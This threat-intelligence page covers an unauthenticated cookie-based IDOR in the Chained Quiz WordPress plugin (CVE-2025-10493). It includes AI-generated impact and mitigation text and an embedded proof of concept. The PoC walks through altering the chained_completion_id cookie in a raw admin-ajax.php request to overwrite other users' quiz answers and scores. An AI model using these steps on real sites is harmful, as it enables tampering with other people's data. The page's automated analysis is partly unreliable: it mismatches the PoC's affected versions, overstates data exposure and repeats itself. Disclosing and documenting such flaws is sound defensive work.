Chained Quiz 1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie
Chained Quiz 1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie
AI Analysis
Technical Summary
The Chained Quiz 1.3.5 application contains an Insecure Direct Object Reference (IDOR) vulnerability that can be exploited without authentication by manipulating cookie values. IDOR vulnerabilities occur when an application uses user-supplied input to access objects directly without proper authorization checks, allowing attackers to access or modify data belonging to other users or administrative functions. In this case, the vulnerability is triggered via cookie manipulation, which means an attacker can craft or alter cookies to gain unauthorized access to restricted resources or data within the Chained Quiz application. Since no authentication is required, the attack surface is broad, and exploitation can be performed remotely without user interaction. The availability of exploit code (not in a specific programming language but as text) lowers the barrier for attackers to develop functional exploits. Although the affected versions list is empty, the title and description specify version 1.3.5 as vulnerable. No patches or fixes are currently linked, indicating that organizations must rely on mitigation strategies until an official update is released. This vulnerability primarily threatens the confidentiality and integrity of data managed by the quiz application, potentially exposing sensitive user information or allowing unauthorized modifications to quiz content or results.
Potential Impact
For European organizations, especially those in education, training, or certification sectors using Chained Quiz 1.3.5, this vulnerability poses significant risks. Unauthorized access could lead to exposure of personal data, quiz answers, or administrative settings, undermining data confidentiality and integrity. Attackers might manipulate quiz results or access sensitive user information, damaging organizational reputation and violating data protection regulations such as GDPR. The unauthenticated nature of the exploit increases the likelihood of attacks, potentially leading to widespread compromise if the software is widely deployed. Additionally, the lack of patches means organizations must act proactively to prevent exploitation. Disruption of quiz services could also impact availability indirectly if attackers modify or delete critical data. Overall, the threat could result in regulatory penalties, loss of user trust, and operational disruptions within affected European institutions.
Mitigation Recommendations
Organizations should immediately audit their use of Chained Quiz software to identify installations of version 1.3.5. Until an official patch is available, implement strict web application firewall (WAF) rules to detect and block suspicious cookie manipulations targeting the quiz application. Enforce server-side validation of all object references, ensuring that access control checks are performed on every request regardless of cookie values. Limit cookie scope and use secure, HttpOnly flags to reduce the risk of tampering. Monitor logs for unusual access patterns or repeated unauthorized attempts. Consider isolating the quiz application behind VPN or internal networks to reduce exposure. Engage with the software vendor or community to obtain updates or patches promptly. Finally, educate administrators and users about the risks and encourage prompt reporting of anomalies.
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Belgium, Italy, Spain
Indicators of Compromise
- exploit-code: # Exploit Title: Chained Quiz 1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie # Date: 19-12-2025 # Exploit Author: Karuppiah Sabari Kumar(0xsabre) # Vendor Homepage: https://wordpress.org/plugins/chained-quiz/ # Software Link: https://downloads.wordpress.org/plugin/chained-quiz.1.3.3.zip # Version: <= 1.3.3 # Tested on: WordPress / Linux # CVE: CVE-2025-10493 ------------------------------------------------------------ ## Vulnerability Type Insecure Direct Object Reference (IDOR) / Improper Authorization ------------------------------------------------------------ ## Description The Chained Quiz plugin stores each quiz attempt using a predictable, auto-incrementing database ID (completion_id) and exposes this value directly in a client-side cookie named: chained_completion_id<quiz_id> When submitting or re-submitting quiz answers via admin-ajax.php, the server updates the quiz attempt record based solely on this cookie value, without verifying that the attempt belongs to the currently authenticated user. No authentication is required to exploit this vulnerability when the plugin is used with default settings. The server retrieves the quiz attempt directly using the completion_id from the cookie and performs an UPDATE query without verifying ownership. As a result, an attacker can hijack or tamper with other users’ quiz attempts by guessing or enumerating valid completion_id values and replaying answer submissions. ------------------------------------------------------------ ## Affected Component Quiz submission and results handling functionality via admin-ajax.php ------------------------------------------------------------ ## Proof of Concept (PoC) ### Step 1: Victim user submission A user completes a quiz. The submission is stored using a completion ID and associated with the user’s session via a cookie, for example: chained_completion_id1=2 ------------------------------------------------------------ ### Step 2: Attacker interception The attacker completes the same quiz and intercepts their own submission request using a proxy or browser developer tools. Example request: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Cookie: chained_completion_id1=1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded answer=0&question_id=1&quiz_id=1&post_id=117&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1 ------------------------------------------------------------ ### Step 3: Tampering The attacker modifies the cookie value to match another user’s quiz attempt, for example: chained_completion_id1=2 The attacker may also modify parameters such as "answer" or "points" to manipulate quiz responses or scores. The modified request is then sent to the server. ------------------------------------------------------------ ### Step 4: Result The server overwrites the victim user’s quiz submission, including answers and points, without validating ownership of the completion ID. ------------------------------------------------------------ ## Impact An attacker can arbitrarily modify quiz answers, scores, or results belonging to other users. This results in an integrity violation of quiz data and allows unauthorized manipulation of finalized quiz attempts. In environments where quiz results are used for assessments, leaderboards, or certificates, this can undermine trust in the platform and affect any downstream integrations that rely on quiz completion data. ------------------------------------------------------------ ## CWE - CWE-639: Authorization Bypass Through User-Controlled Key - CWE-285: Improper Authorization ------------------------------------------------------------
Chained Quiz 1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie
Description
Chained Quiz 1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie
AI-Powered Analysis
Technical Analysis
The Chained Quiz 1.3.5 application contains an Insecure Direct Object Reference (IDOR) vulnerability that can be exploited without authentication by manipulating cookie values. IDOR vulnerabilities occur when an application uses user-supplied input to access objects directly without proper authorization checks, allowing attackers to access or modify data belonging to other users or administrative functions. In this case, the vulnerability is triggered via cookie manipulation, which means an attacker can craft or alter cookies to gain unauthorized access to restricted resources or data within the Chained Quiz application. Since no authentication is required, the attack surface is broad, and exploitation can be performed remotely without user interaction. The availability of exploit code (not in a specific programming language but as text) lowers the barrier for attackers to develop functional exploits. Although the affected versions list is empty, the title and description specify version 1.3.5 as vulnerable. No patches or fixes are currently linked, indicating that organizations must rely on mitigation strategies until an official update is released. This vulnerability primarily threatens the confidentiality and integrity of data managed by the quiz application, potentially exposing sensitive user information or allowing unauthorized modifications to quiz content or results.
Potential Impact
For European organizations, especially those in education, training, or certification sectors using Chained Quiz 1.3.5, this vulnerability poses significant risks. Unauthorized access could lead to exposure of personal data, quiz answers, or administrative settings, undermining data confidentiality and integrity. Attackers might manipulate quiz results or access sensitive user information, damaging organizational reputation and violating data protection regulations such as GDPR. The unauthenticated nature of the exploit increases the likelihood of attacks, potentially leading to widespread compromise if the software is widely deployed. Additionally, the lack of patches means organizations must act proactively to prevent exploitation. Disruption of quiz services could also impact availability indirectly if attackers modify or delete critical data. Overall, the threat could result in regulatory penalties, loss of user trust, and operational disruptions within affected European institutions.
Mitigation Recommendations
Organizations should immediately audit their use of Chained Quiz software to identify installations of version 1.3.5. Until an official patch is available, implement strict web application firewall (WAF) rules to detect and block suspicious cookie manipulations targeting the quiz application. Enforce server-side validation of all object references, ensuring that access control checks are performed on every request regardless of cookie values. Limit cookie scope and use secure, HttpOnly flags to reduce the risk of tampering. Monitor logs for unusual access patterns or repeated unauthorized attempts. Consider isolating the quiz application behind VPN or internal networks to reduce exposure. Engage with the software vendor or community to obtain updates or patches promptly. Finally, educate administrators and users about the risks and encourage prompt reporting of anomalies.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52464
- Has Exploit Code
- true
- Code Language
- text
Indicators of Compromise
Exploit Source Code
Exploit code for Chained Quiz 1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie
# Exploit Title: Chained Quiz 1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie # Date: 19-12-2025 # Exploit Author: Karuppiah Sabari Kumar(0xsabre) # Vendor Homepage: https://wordpress.org/plugins/chained-quiz/ # Software Link: https://downloads.wordpress.org/plugin/chained-quiz.1.3.3.zip # Version: <= 1.3.3 # Tested on: WordPress / Linux # CVE: CVE-2025-10493 ------------------------------------------------------------ ## Vulnerability Type Insecure Direct Object Reference... (3262 more characters)
Threat ID: 694d89022ffa995e0c012b32
Added to database: 12/25/2025, 6:57:06 PM
Last enriched: 12/25/2025, 6:57:31 PM
Last updated: 12/26/2025, 4:42:29 AM
Views: 16
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
CriticalWordPress Quiz Maker 6.7.0.56 - SQL Injection
MediumThreatsDay Bulletin: Stealth Loaders, AI Chatbot Flaws AI Exploits, Docker Hack, and 15 More Stories
MediumFortinet Warns of Active Exploitation of FortiOS SSL VPN 2FA Bypass Vulnerability
HighCISA Flags Actively Exploited Digiever NVR Vulnerability Allowing Remote Code Execution
HighActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.